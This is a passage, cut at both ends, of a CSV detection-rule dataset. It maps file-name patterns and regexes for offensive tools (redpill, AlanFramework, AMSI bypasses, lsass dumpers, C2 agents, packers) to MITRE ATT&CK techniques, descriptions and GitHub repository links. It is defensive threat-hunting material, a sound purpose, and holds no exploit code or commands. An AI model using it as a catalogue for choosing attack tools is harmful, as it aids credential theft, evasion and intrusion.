TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\AdsMasquerade.ps1*",".{0,1000}\\AdsMasquerade\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AES_cryptor.py *",".{0,1000}\\AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*\agent_exe.exe*",".{0,1000}\\agent_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\alan.log*",".{0,1000}\\alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\Alan.v*.zip*",".{0,1000}\\Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\Alcatraz.exe*",".{0,1000}\\Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*\All_attack.txt*",".{0,1000}\\All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\AlwaysInstallElevated.cs*",".{0,1000}\\AlwaysInstallElevated\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\amsi\dll.zip*",".{0,1000}\\amsi\\dll\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\amsi\hook-win32.dll*",".{0,1000}\\amsi\\hook\-win32\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\amsi\hook-win64.dll*",".{0,1000}\\amsi\\hook\-win64\.dll.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\AmsiBypass.*",".{0,1000}\\AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*\AMSIPatcher.cs*",".{0,1000}\\AMSIPatcher\.cs.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*\AmsiProvider.cpp*",".{0,1000}\\AmsiProvider\.cpp.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*\AmsiProvider.sln*",".{0,1000}\\AmsiProvider\.sln.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*\AMSI-Provider-main*",".{0,1000}\\AMSI\-Provider\-main.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*\AmsiTrigger.csproj*",".{0,1000}\\AmsiTrigger\.csproj.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\AmsiTrigger.pdb*",".{0,1000}\\AmsiTrigger\.pdb.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\AmsiTrigger.sln*",".{0,1000}\\AmsiTrigger\.sln.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\AMSITrigger\*",".{0,1000}\\AMSITrigger\\.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\AMSITrigger-master*",".{0,1000}\\AMSITrigger\-master.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*\Andrew.dmp*",".{0,1000}\\Andrew\.dmp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*\anti_analysis.exe*",".{0,1000}\\anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\anti_debug.exe*",".{0,1000}\\anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\antiDefense.cpp*",".{0,1000}\\antiDefense\.cpp.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\AntiTamper.exe*",".{0,1000}\\AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\AoratosWin*",".{0,1000}\\AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*\apc_injection.exe*",".{0,1000}\\apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\APCLdr.*",".{0,1000}\\APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","4","300","52","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*\api_hooking.exe*",".{0,1000}\\api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Apollo.exe*",".{0,1000}\\Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*\Appdata\*\aloy64.exe*",".{0,1000}\\Appdata\\.{0,1000}\\aloy64\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\Beacon.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\Beacon01.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon01\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\Beacon02.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon02\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Appdata\*\kitty.exe*",".{0,1000}\\Appdata\\.{0,1000}\\kitty\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Camera.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\factura.exe*",".{0,1000}\\AppData\\Local\\Temp\\factura\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\AppData\Local\Temp\GetLogs.ps1*",".{0,1000}\\AppData\\Local\\Temp\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\KPortScan*",".{0,1000}\\AppData\\Local\\Temp\\KPortScan.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*\AppData\Local\Temp\Leaked.txt*",".{0,1000}\\AppData\\Local\\Temp\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\Payload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Payload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","https://github.com/r00t-3xp10it/redpill","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\Screenshot.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\SSIDump.zip*",".{0,1000}\\AppData\\Local\\Temp\\SSIDump\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\Start-WebServer..ps1*",".{0,1000}\\AppData\\Local\\Temp\\Start\-WebServer\.\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\StartWebServer.ps1*",".{0,1000}\\AppData\\Local\\Temp\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\tor --*",".{0,1000}\\AppData\\Local\\Temp\\tor\s\-\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Upload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\AppData\Local\Temp\webserver.ps1*",".{0,1000}\\AppData\\Local\\Temp\\webserver\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\args_spoofing-rs.exe*",".{0,1000}\\args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\arsenal-1.1.0.zip*",".{0,1000}\\arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\arsenal-1.2.0.zip*",".{0,1000}\\arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\arsenal-1.2.1.zip*",".{0,1000}\\arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\arsenal-master.zip*",".{0,1000}\\arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\Ask4Creds.ps1*",".{0,1000}\\Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\asm\x64\alter_pe_sections*",".{0,1000}\\asm\\x64\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\asm\x86\alter_pe_sections*",".{0,1000}\\asm\\x86\\alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 